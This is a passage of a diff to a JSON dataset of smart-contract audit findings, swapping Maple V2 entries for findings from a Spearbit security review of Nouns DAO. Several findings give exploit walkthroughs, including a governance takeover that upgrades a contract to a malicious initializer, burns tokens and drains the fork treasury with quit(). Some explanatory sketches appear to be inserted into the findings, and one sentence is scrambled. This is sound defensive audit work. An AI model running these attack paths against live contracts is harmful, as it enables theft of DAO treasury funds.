erc20token = IERC20(erc20TokensToIncludeInQuit[i]); uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply; bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend); if (!erc20Sent) revert QuitERC20TransferFailed(); } >> uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply; bool ethSent = timelock.sendETH(msg.sender, ethToSend); if (!ethSent) revert QuitETHTransferFailed(); emit Quit(msg.sender, tokenIds); } 6. The forked treasury is 2 stETH and 150 ETH; cBob calls quit() again without reentering (say on a zero original nouns balance condition), obtains 1 stETH and 75 ETH, and the same is left for Alice. Bob stole 25 ETH from Alice. The attacking function logic can be as simple as {quit() as long as there is a forkedNoun on my balance, perform joinFork() on the callback as long as there is a noun on my balance}. Alice lost a part of the treasury funds. The scale of the steps above can be increased to drain more significant value in absolute terms. Per low likelihood and high principal funds loss impact setting the severity to be medium.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Globals.poolDelegates[delegate_].ownedPoolManager mapping can be overwritten", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The Globals.poolDelegates[delegate_].ownedPoolManager mapping keeps track of a single pool manager for a pool delegate.
It can happen that the same pool delegate is registered for a second pool manager and the mapping is overwritten, by calling PM.acceptPendingPoolDelegate -> Globals.transferOwnedPoolManager or Globals.activatePoolManager.", + "title": "A malicious DAO can mint arbitrary fork DAO tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The original DAO is assumed to be honest during the fork period, which is reinforced in the protocol by preventing it from executing any malicious proposals during that time. Fork joiners are minted fork DAO tokens by the original DAO via claimDuringForkPeriod(), which enforces the fork period on the fork DAO side. However, the notion of fork period is different on the fork DAO compared to the original DAO (as described in Issue 16), i.e. while the original DAO excludes forkEndTimestamp from the fork period, the fork DAO includes forkingPeriodEndTimestamp in its notion of the fork period. If the original DAO executes a malicious proposal exactly in the block at forkEndTimestamp which makes a call to claimDuringForkPeriod() to mint arbitrary fork DAO tokens, then the proposal will succeed on the original DAO side because it is one block beyond its notion of the fork period. The claimDuringForkPeriod() will succeed on the fork DAO side because it is in the last block of its notion of the fork period. The original DAO therefore can successfully mint arbitrary fork DAO tokens, which can be used to: 1) brick the fork DAO when those tokens are attempted to be minted via auctions later or 2) manipulate the fork DAO governance to steal its treasury funds. In PoS, blocks are exactly 12 seconds apart. With forkEndTimestamp = block.timestamp + ds.forkPeriod; and ds.forkPeriod now set to 7 days, forkEndTimestamp is exactly 50400 blocks (7*24*60*60/12) after the block in which executeFork() was executed. A malicious DAO can coordinate to execute such a proposal exactly in that block. Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Pool withdrawals can be kept low by non-redeeming users", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "In the current pool design, users request to exit the pool and are scheduled for a withdrawal window in the withdrawal manager. If the pool does not have enough liquidity, their share of the available pool liquidity is proportionate to the total shares of all users who requested to withdraw in that withdrawal window. It's possible for griefers to keep the withdrawals artificially low by requesting a withdrawal but not actually withdrawing during the withdrawal window. These griefers are not penalized but their behavior leads to worse withdrawal amounts for every other honest user.", + "title": "Inattentive fork escrowers may lose funds to fork quitters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Fork escrowers already have their original DAO treasury pro rata funds transferred to the fork DAO treasury (when the fork executes) and are expected to claimFromEscrow() after the fork executes to mint their fork DAO tokens and thereby lay claim on their pro rata share of the fork DAO treasury for governance or exiting. Inattentive fork escrowers who fail to do so will force a delayed governance of 30 days (currently proposed value) on the fork DAO and beyond that will allow fork DAO members to quit with a greater share of the fork DAO treasury, because fork execution transfers all escrowers' original DAO treasury funds to the fork DAO treasury.
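A hedged worked example of how non-claimers inflate quitters' shares (the numbers are assumed for illustration, not from the report): // The fork treasury was funded pro rata for 100 escrowed nouns, but only 50 were // claimed before governance activated. quit() pays out per noun: // share = treasuryBalance * tokenIds.length / adjustedTotalSupply() // = treasuryBalance * 1 / 50, double the 1 / 100 share each escrower paid in.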
Inattentive slow-/non-claiming fork escrowers may lose funds to quitters if they do not claim their fork DAO tokens before its governance becomes active 30 days after the fork executes. They will also be unaccounted for in DAO functions like quorum and proposal threshold. While we would expect fork escrowers to be attentive and claim their fork DAO tokens well within the delayed governance period, the protocol design can be more defensive of slow-/non-claimers by protecting their funds on the fork DAO from quitters. Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "_getCollateralRequiredFor should round up", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The _getCollateralRequiredFor rounds down the collateral that is required from the borrower. This benefits the borrower.", + "title": "Upgrading timelock without transferring the nouns from old timelock balance will increase adjusted total supply", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "There is one noun on the timelock V1 balance, and there can be others as of migration time: etherscan.io/token/0x9c8ff314c9bc7f6e59a9d9225fb22946427edc03?a=0x0BC3807Ec262cB779b38D65b38158acC3bfedE10 Changing ds.timelock without a nouns transfer will increase the adjusted total supply: NounsDAOV3Fork.sol#L199-L201 function adjustedTotalSupply(NounsDAOStorageV3.StorageV3 storage ds) internal view returns (uint256) { return ds.nouns.totalSupply() - ds.nouns.balanceOf(address(ds.timelock)) - ds.forkEscrow.numTokensOwnedByDAO(); } As of the time of this writing adjustedTotalSupply() will be increased by 1 due to the treasury token reclassification; the upgrade will cause a (13470 + 14968) * 1733.0 * (1 / 742 - 1 / 743) = 89 USD loss per noun or (13470 + 14968) * 1733.0 / 743 = 66330 USD cumulatively for all nouns holders. Per high likelihood and low impact setting the severity to be medium.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Use the cached variable in makePayment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The claim function is called using _nextPaymentDueDate instead of nextPaymentDueDate_", + "title": "Fork escrowers can exploit the fork or force late joiners to quit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Based on the current supply of Nouns and the following parameters that will be used during the upgrade to V3: Nouns total supply: 743 forkThresholdBPS_: 2000 (20%) forkThreshold: 148, hence 149 Nouns need to be escrowed to be able to call executeFork() The following attack vector would be possible: 1. Attacker escrows 75 tokens. 2. Bob escrows 74 tokens to reach the forkThreshold. 3. Bob calls executeFork() and claimFromEscrow(). 4. Attacker calls claimFromEscrow() right away. As now nouns.remainingTokensToClaim() is zero, the governance is now active and proposals can be created. 5.
Attacker creates a malicious proposal. Currently the attacker has 75 Nouns and Bob 74 in the fork. This means that the attacker has the majority of the voting power and whatever he proposes cannot be denied. NounsForkToken.getPriorVotes(attacker, ) -> 75 NounsForkToken.getPriorVotes(Bob , ) -> 74 6. The proposal is created with the following description: \"Proposal created to upgrade the NounsAuctionHouseFork to a new implementation similar to the main NounsAuctionHouse\". The attacker deploys this new implementation and simply performs the following change in the code: modifier initializer() { - require(_initializing || !_initialized, \"Initializable: contract is already initialized\"); + require(!_initializing || _initialized, \"Initializable: contract is already initialized\"); bool isTopLevelCall = !_initializing; if (isTopLevelCall) { _initializing = true; _initialized = true; } _; if (isTopLevelCall) { _initializing = false; } } The proposal is created with the following data: targets[0] = address(contract_NounsAuctionHouseFork); values[0] = 0; signatures[0] = 'upgradeTo(address)'; calldatas[0] = abi.encode(address(contract_NounsAuctionHouseForkExploitableV1)); 7. The proposal is created and is now in Pending state. During the next days, users keep joining the fork, increasing the funds of the fork treasury as the fork period is still active. 8. 5 days later the proposal is in Active state and the attacker votes to pass it. Bob, who does not like the proposal, votes to reject it. quorumVotes: 14 forVotes: 75 againstVotes: 74 9. As the attacker and Bob were the only users that had any voting power at the time of proposal creation, five days later, the proposal is successful. 10. The proposal is queued. 11. 3 weeks later the proposal is executed. 12. The NounsAuctionHouseFork contract is upgraded to the malicious version and the attacker re-initializes it and sets himself as the owner: contract_NounsAuctionHouseFork.initialize(attacker, NounsForkToken, , 0, 0, 0, 0) 13. The attacker, who is now the owner, upgrades the NounsAuctionHouseFork contract, once again, to a new implementation that implements the following function: function burn(uint256[] memory _nounIDs) external onlyOwner{ for (uint256 i; i < _nounIDs.length; ++i){ nouns.burn(_nounIDs[i]); } } 14. The attacker now burns all the Nouns tokens in the fork except the ones that he owns. 15. The attacker calls quit() draining the whole treasury: NounsTokenFork.totalSupply() -> 75 attacker.balance -> 0 contract_stETH.balanceOf(attacker) -> 0 forkTreasury.balance -> 2005_383580080753701211 contract_stETH.balanceOf(forkTreasury) -> 2005_383580080753701210 attacker calls -> contract_NounsDAOLogicV1Fork.quit([0, ... 74]) attacker.balance -> 2005_383580080753701211 contract_stETH.balanceOf(attacker) -> 2005_383580080753701208 forkTreasury.balance -> 0 contract_stETH.balanceOf(forkTreasury) -> 1 Basically, the condition that should be met for this exploit is that at the time of proposal creation the attacker has more than 51% of the voting power. This is more likely to happen in small forks. If this happens, users will be forced to leave or be exploited.
As there is no vetoer role, no one will be able to stop this type of proposal.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "No need to explicitly initialize variables with default values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "By default a value of a variable is set to 0 for uint, false for bool, address(0) for address... Explicitly initializing/setting it with its default value wastes gas.", + "title": "Including non-standard ERC20 tokens will revert and prevent forking/quitting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "If erc20TokensToIncludeInFork or erc20TokensToIncludeInQuit accidentally/maliciously include non-conforming ERC20 tokens, such as USDT, which do not return a boolean value on transfers, then sendProRataTreasury() and quit() will revert because they expect timelock.sendERC20() to return true from the underlying ERC20 transfer call. The use of transfer() instead of safeTransfer() allows this scenario. Low likelihood + High impact = Medium severity. Inclusion of USDT-like tokens in the protocol will revert sendProRataTreasury() and quit() and prevent forking/quitting.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Cache calculation in getExpectedAmount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The decimal precision calculation is used twice in the getExpectedAmount function; caching it into a new variable would save some gas.", + "title": "Changing voteSnapshotBlockSwitchProposalId after it was set allows for votes double counting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Now ds.voteSnapshotBlockSwitchProposalId can be changed after it was once set to the next proposal id; there are no restrictions on repetitive setting. At the same time, proposal votes are counted without saving the additional information needed to reconstruct the timing, and voteSnapshotBlockSwitchProposalId moved forward as a result of such a second _setVoteSnapshotBlockSwitchProposalId() call will produce a situation when all the older, already cast, votes for the proposals with old_voteSnapshotBlockSwitchProposalId <= id < new_voteSnapshotBlockSwitchProposalId will be counted as of proposal.startBlock, while all the newer, still to be cast, votes for the very same proposals will be counted as of proposal.creationBlock. Since the voting power of users can vary in-between these timestamps, this will violate the equality of voting conditions for all such proposals. Double counting will be possible and total votes greater than total supply can be cast this way: say Bob has transferred his nouns to Alice between proposal.startBlock and proposal.creationBlock, Alice voted before the change, Bob voted after the change. Bob's nouns will be counted twice. Severity is medium: the impact looks to be high, as a violation of voting on an equal footing paves the way for voting manipulations, but there is a low likelihood prerequisite of passing a proposal for the second update of the voteSnapshotBlockSwitchProposalId. The latter can happen as a part of a bigger pack of changes.
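A hedged sketch of a one-time-set guard that would rule out the repeated switch (the storage field name follows the finding; the guard and error are our assumptions, not the implementation): function _setVoteSnapshotBlockSwitchProposalId(NounsDAOStorageV3.StorageV3 storage ds) external { // Sketch: once the switch proposal id is set, refuse to move it forward again, so // older and newer votes on the same proposal always use the same snapshot block. if (ds.voteSnapshotBlockSwitchProposalId != 0) revert VoteSnapshotSwitchAlreadySet(); ds.voteSnapshotBlockSwitchProposalId = ds.proposalCount + 1; }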
The _setVoteSnapshotBlockSwitchProposalId() call does not have arguments, and by itself repeating it doesn't look incorrect.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "For-Loop Optimization", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The for-loop can be optimized in 4 ways: 1. Removing initialization of loop counter if the value is 0 by default. 2. Caching array length outside the loop. 3. Prefix increment (++i) instead of postfix increment (i++). 4. Unchecked increment. - for (uint256 i_ = 0; i_ < loans_.length; i_++) { + uint256 length = loans_.length; + for (uint256 i_; i_ < length; ) { ... + unchecked { ++i; } }", + "title": "Key fork parameters are set outside of proposal flow, while aren't being controlled in the code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "These configuration parameters are crucial for the fork workflow and new DAO logic, but aren't checked when being set in ForkDAODeployer's constructor: ForkDAODeployer.sol#L31-L81 contract ForkDAODeployer is IForkDAODeployer { ... constructor( address tokenImpl_, address auctionImpl_, address governorImpl_, address treasuryImpl_, uint256 delayedGovernanceMaxDuration_, uint256 initialVotingPeriod_, uint256 initialVotingDelay_, uint256 initialProposalThresholdBPS_, uint256 initialQuorumVotesBPS_ ) { } ... delayedGovernanceMaxDuration = delayedGovernanceMaxDuration_; initialVotingPeriod = initialVotingPeriod_; initialVotingDelay = initialVotingDelay_; initialProposalThresholdBPS = initialProposalThresholdBPS_; initialQuorumVotesBPS = initialQuorumVotesBPS_; While most parameters are set via proposals directly and are controlled in the corresponding setters, these 5 variables are defined only once on ForkDAODeployer construction and are neither per se visible in proposals, as ForkDAODeployer is being set as an address there, nor being controlled within the corresponding setters this way. Their values aren't controlled on construction either.
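A hedged sketch of the missing construction-time checks (the bounds and error names are illustrative assumptions, not values from the report): constructor( ..., uint256 delayedGovernanceMaxDuration_, uint256 initialProposalThresholdBPS_, uint256 initialQuorumVotesBPS_ ) { // Sketch: reject obviously broken fork parameters at deployment time. if (delayedGovernanceMaxDuration_ == 0) revert InvalidDelayedGovernanceDuration(); if (initialProposalThresholdBPS_ == 0 || initialQuorumVotesBPS_ > 10_000) revert InvalidBPS(); // ... }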
NounsDAOLogicV3.sol#L820-L840 /** * @notice Admin function for setting the fork related parameters * @param forkEscrow_ the fork escrow contract * @param forkDAODeployer_ the fork dao deployer contract * @param erc20TokensToIncludeInFork_ the ERC20 tokens used when splitting funds to a fork * @param forkPeriod_ the period during which it's possible to join a fork after execution * @param forkThresholdBPS_ the threshold required of escrowed nouns in order to execute a fork */ function _setForkParams( address forkEscrow_, address forkDAODeployer_, address[] calldata erc20TokensToIncludeInFork_, uint256 forkPeriod_, uint256 forkThresholdBPS_ ) external { ds._setForkEscrow(forkEscrow_); ds._setForkDAODeployer(forkDAODeployer_); ds._setErc20TokensToIncludeInFork(erc20TokensToIncludeInFork_); ds._setForkPeriod(forkPeriod_); ds._setForkThresholdBPS(forkThresholdBPS_); } NounsDAOV3Admin.sol#L484-L495 /** * @notice Admin function for setting the fork DAO deployer contract */ function _setForkDAODeployer(NounsDAOStorageV3.StorageV3 storage ds, address newForkDAODeployer) external onlyAdmin(ds) { address oldForkDAODeployer = address(ds.forkDAODeployer); ds.forkDAODeployer = IForkDAODeployer(newForkDAODeployer); emit ForkDAODeployerSet(oldForkDAODeployer, newForkDAODeployer); } Impact: as an example, setting delayedGovernanceMaxDuration = 0 bypasses NounsDAOLogicV1Fork's checkGovernanceActive() control and allows for stealing the whole treasury of a new forked DAO with a NounsTokenFork.claimFromEscrow() -> NounsDAOLogicV1Fork.quit() call back-running the executeFork() deployment transaction. An attacker will be entitled to 1 / 1 = 100% of the new DAO funds, being the only one who claimed. Setting medium severity per low likelihood and high impact of misconfiguration, which can happen either as an operational mistake or driven by a malicious intent.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Pool._divRoundUp can be more efficient", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The gas cost of Pool._divRoundUp can be reduced in the context that it's used in.", + "title": "A malicious DAO can hold token holders captive by setting forkPeriod to an unreasonably low value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "A malicious majority can reduce the number of Noun holders joining an executed fork by setting the forkPeriod to an unreasonably low value, e.g. 0, because there is no MIN_FORK_PERIOD enforced (MAX is 14 days). This in combination with an unreasonably high forkThresholdBPS (no min/max enforced) will allow a malicious majority to hold captive those minority Noun holders who missed the fork escrow window, cannot join the fork in the unreasonably small fork period and do not have sufficient voting power to fork again. While the accidental setting of the lower bound to an undesirable value poses a lower risk than that of the upper bound, this is yet another vector of attack by a malicious majority on forking capability/effectiveness. While the majority can upgrade the DAO entirely at will to circumvent all such guardrails, we hypothesise that would get more/all attention by token holders than modification of governance/fork parameters whose risk/impact may not be apparent immediately to non-technical or even technical holders.
So unless there is an automated impact review/analysis performed as part of governance processes, such proposal vectors on governance/forking parameters should be considered as posing non-negligible risk. Impact: Inattentive minority Noun holders are unable to join the fork and forced to stick with the original DAO. Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Liquidator uses different reentrancy guards than rest of codebase", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "All other reentrancy guards of the codebase use values 1/2 instead of 0/1 to indicate NOT_LOCKED/LOCKED.", + "title": "A malicious DAO can prevent forking by manipulating the forkThresholdBPS value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "While some of the documentation, see 1 and 2, notes that the fork threshold is expected to be 20%, the forkThresholdBPS is a DAO governance controlled value that may be modified via _setForkThresholdBPS(). A malicious majority can prevent forking at any time by setting the forkThresholdBPS to an unreasonably high value that is >= the majority voting power. For a fork that is slowly gathering support via escrowing (thus giving time for a DAO proposal to be executed), a malicious majority can reactively manipulate forkThresholdBPS to prevent that fork from being executed. While the governance process gives an opportunity to detect and block such malicious proposals, the assumption is that a malicious majority can force through any proposal, even a visibly malicious one. Also, it is not certain that all governance proposals undergo thorough scrutiny of security properties and their impacts. Token holders need to actively monitor all proposals for malicious updates to create, execute and join a fork before such a proposal takes effect. A malicious majority can prevent a minority from forking by manipulating the forkThresholdBPS value. Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Use block.timestamp instead of domainStart in removeLoanImpairment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The removeLoanImpairment function adds back all interest from the payment's start date to domainStart. The _advanceGlobalPaymentAccounting sets domainStart to block.timestamp.", + "title": "A malicious DAO can prevent/deter token holders from executing/joining a fork by including arbitrary addresses in erc20TokensToIncludeInFork", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "As motivated in the fork spec, forking is a minority protection mechanism that should always allow a group of minority token holders to exit together into a new instance of Nouns DAO.
Also, it is not certain that all governance proposals undergo thorough scrutiny of security properties which allows a proposal to hide malicious ERC20 tokens and get them included in the DAO's allow list. Token holders need to monitor all proposals for malicious updates to create, execute and join a fork before such a proposal takes effect. _setErc20TokensToIncludeInFork()) addresses revert arbitrary include that via Furthermore, a forking token holder may not necessarily want to receive all the DAO's ERC20 tokens in their new fork DAO for various reasons. For e.g., custody of certain ERC20 tokens may not be legal in their regulatory jurisdictions and so they may not want to interact with a DAO whose treasury holds such tokens and may send them at some point (e.g. rage quit). Minority token holders may even want to fork specifically because of an ERC20's presence or proposed inclusion in the DAO treasury. Giving forking holders a choice of ERC20s to take to fork DAO gives them a choice to fork anytime only with ETH and a subset of approved tokens if the DAO has already managed to add malicious/contentious ERC20s in the list. 1. A malicious DAO can prevent unsuspecting/inattentive or future token holders from forking and taking out their pro rata funds, which is the main motivation for minority protection as specified. 2. A forking token holder is forced to end up with a fork DAO treasury that has all the original DAO's ERC20 tokens without having a choice, which may deter them from creating/executing/joining a fork in the first place. Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "setTimelockWindows checks isGovernor multiple times", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The Globals.setTimelockWindows function calls setTimelockWindow in a loop and each time set- TimelockWindow's isGovernor is checked.", + "title": "A malicious new DAO can prevent/deter token holders from rage quitting by including arbitrary addresses in erc20TokensToIncludeInQuit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "As described in the fork spec: \"New DAOs are deployed with vanilla ragequit in place; otherwise it's possible for a new DAO majority to collude to hurt a minority, and the minority wouldn't have any last resort if they can't reach the forking threshold; furthermore bullies/attackers can recursively chase minorities into fork DAOs in an undesired attrition war.\". However, a malicious new DAO may include arbitrary addresses in erc20TokensToIncludeInQuit (modifiable via _setErc20TokensToIncludeInQuit()) that revert on balanceOf() or transfer() calls to prevent token holders from rage quitting. While the governance process gives an opportunity to detect and block such malicious pro- posals, the assumption is that a malicious majority can force through any proposal, even a visibly malicious one. Also, it is not certain that all governance proposals undergo thorough scrutiny of security properties which allows a proposal to hide malicious ERC20 tokens and get them included in the DAO's allow list. Token holders need to monitor all proposals for malicious updates and rage quit before such a proposal takes effect. Furthermore, a rage quitting token holder may not necessarily want to receive all the DAO's ERC20 tokens for various reasons. 
For example, custody of certain ERC20 tokens may not be legal in their regulatory jurisdictions. (1) A malicious new DAO can prevent unsuspecting/inattentive token holders from rage quitting and taking out their pro rata funds, which is a critical capability for minority protection as specified. (2) A rage quitting token holder is forced to receive all the DAO's ERC20 tokens without having a choice, which may deter them from quitting.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "fullDaysLate computation can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The fullDaysLate computation can be optimized.", + "title": "Missing check for vetoed proposal's target timelock can cancel transactions from other proposals on new DAO treasury", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "veto() always assumes that the proposal being vetoed is targeting ds.timelock (i.e. the new DAO treasury) instead of checking via getProposalTimelock() as done by the queue(), execute() and cancel() functions. If the proposal being vetoed were targeting timelockV1 (i.e. the original DAO treasury), then this results in calling cancelTransaction() on the wrong timelock, which sets queuedTransactions[txHash] to false for the values of target, value, signature, data and eta. The proposal state is vetoed with zombie queued transactions on timelockV1 which will never get executed. But if there coincidentally were valid transactions with the same values (of target, value, signature, data and eta) from other proposals queued (assuming in the same block and that both timelocks have the same delay so that eta is the same) on ds.timelock, then those would unexpectedly and incorrectly get dequeued and will not be executed even when these other ds.timelock-targeting proposals were neither vetoed nor cancelled. Successfully voted proposals on the new DAO treasury have their transactions cancelled before execution. Confirmed with PoC: veto_poc.txt Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk NounsDAOV3Proposals.sol#L435 NounsDAOV3Proposals.sol#L527-L544" ] }, { - "title": "Users can prevent repossessed funds from being claimed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The DebtLocker.sol contract dictates an active liquidation by the following two conditions: The _liquidator state variable is a non-zero address. The current balance of the _liquidator contract is non-zero. If an arbitrary user sends 1 wei of funds to the liquidator's address, the borrower will be unable to claim repos- sessed funds as seen in the _handleClaimOfRepossessed() function. While the scope of the audit only covered the diff between v3.0.0 and v4.0.0-rc.0, the audit team decided it was important to include this as an informational issue. The Maple team will be addressing this in their V2 release.", + "title": "Proposal threshold can be bypassed through the proposeBySigs() function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The function proposeBySigs() allows users to delegate their voting power to a proposer through signatures so the proposer can create a proposal.
The only condition is that the sum of the signers' voting power should be higher than the proposal threshold. In the line uint256 proposalId = ds.proposalCount = ds.proposalCount + 1;, the ds.proposalCount is increased but the proposal has not been created yet, meaning that the NounsDAOStorageV3.Proposal struct is, at this point, uninitialized, so when the checkNoActiveProp() function is called the proposal state is DEFEATED. As the proposal state is DEFEATED, the checkNoActiveProp() call would not revert in the case that a signer is repeated in the NounsDAOStorageV3.ProposerSignature[] array: function checkNoActiveProp(NounsDAOStorageV3.StorageV3 storage ds, address proposer) internal view { uint256 latestProposalId = ds.latestProposalIds[proposer]; if (latestProposalId != 0) { NounsDAOStorageV3.ProposalState proposersLatestProposalState = state(ds, latestProposalId); if ( proposersLatestProposalState == NounsDAOStorageV3.ProposalState.ObjectionPeriod || proposersLatestProposalState == NounsDAOStorageV3.ProposalState.Active || proposersLatestProposalState == NounsDAOStorageV3.ProposalState.Pending || proposersLatestProposalState == NounsDAOStorageV3.ProposalState.Updatable ) revert ProposerAlreadyHasALiveProposal(); } } Because of this, it is possible to bypass the proposal threshold and create any proposal by signing multiple proposerSignatures with the same signer over and over again. This would keep increasing the total voting power accounted by the smart contract until this voting power is higher than the proposal threshold. Medium likelihood + Medium impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "MEV whenever totalAssets jumps", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "An attack users can try to capture large interest payments is sandwiching a payment with a deposit and a withdrawal. The current codebase tries to mostly eliminate this attack by: Optimistically assuming the next interest payment will be paid back and accruing the interest payment linearly over the payment interval. Adding a withdrawal period. However, there are still circumstances where the totalAssets increase by a large amount at once: Users paying back their payment early. The jump in totalAssets will be the paymentAmount - timeE- lapsedSincePaymentStart / paymentInterval * paymentAmount. Users paying back their entire loan early (closeLoan). Late payments increase it by the late interest fees and the accrued interest for the next payment from its start date to now. 21", + "title": "Attacker can utilize bear market conditions to profit from forking the Nouns DAO", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "An economic attack vector has been identified that could potentially compromise the integrity of the Nouns DAO treasury, specifically due to the introduction of forking functionality. Currently, the treasury holds approximately $24,745,610.99 in ETH and about $27,600,000 in STETH. There are roughly 738 nouns tokens. As per OpenSea listings, the cheapest nouns token can be purchased for about 31 ETH, approximately $53,000. Meanwhile, the daily auction price for the nouns stands at approximately 28 ETH, which equals about $48,600.
A prospective attacker may exploit the current bear market conditions, marked by discounted prices, to buy multiple nouns tokens at a low price, execute a fork to create a new DAO and subsequently claim a portion of the treasury. This act would result in the attacker gaining more than they invested, at the expense of the Nouns DAO treasury. To illustrate, if the forking threshold is established at 20%, an attacker would need 148 nouns to execute a fork. Consider the scenario where a user purchases 148 nouns for a total of 4588 ETH (148 x 31 ether). The forkTreasury.balance would be 2679.27 ETH, and stETH.balanceOf(forkTreasury) would stand at 3000.7 ETH. The total ETH obtained would amount to 5680.01 ETH, thereby yielding a profit of 1092 ETH ($2,024,568).", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Use ERCHelper approve() as best practice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The ERC20 approve function is being used by fundsAsset in fundLoan() to approve the max amount which does not check the return value.", + "title": "Setting NounsAuctionHouse's timeBuffer too big is possible, which will freeze bidder's funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "It is now possible to set timeBuffer to an arbitrarily big value with setTimeBuffer(); there is no check: NounsAuctionHouse.sol#L161-L169 /** * @notice Set the auction time buffer. * @dev Only callable by the owner. */ function setTimeBuffer(uint256 _timeBuffer) external override onlyOwner { timeBuffer = _timeBuffer; emit AuctionTimeBufferUpdated(_timeBuffer); } This can freeze user funds, as NounsAuctionHouse holds the current bid but its release is conditional on block.timestamp >= _auction.endTime: NounsAuctionHouse.sol#L96-L98 function settleAuction() external override whenPaused nonReentrant { _settleAuction(); } NounsAuctionHouse.sol#L221-L234 function _settleAuction() internal { INounsAuctionHouse.Auction memory _auction = auction; require(_auction.startTime != 0, \"Auction hasn't begun\"); require(!_auction.settled, 'Auction has already been settled'); require(block.timestamp >= _auction.endTime, \"Auction hasn't completed\"); >> auction.settled = true; if (_auction.bidder == address(0)) { nouns.burn(_auction.nounId); } else { nouns.transferFrom(address(this), _auction.bidder, _auction.nounId); } timeBuffer can thus be set to an arbitrarily big value, say 10^6 years, effectively freezing the current bidder's funds: NounsAuctionHouse.sol#L104-L129 function createBid(uint256 nounId) external payable override nonReentrant { ... // Extend the auction if the bid was received within `timeBuffer` of the auction end time bool extended = _auction.endTime - block.timestamp < 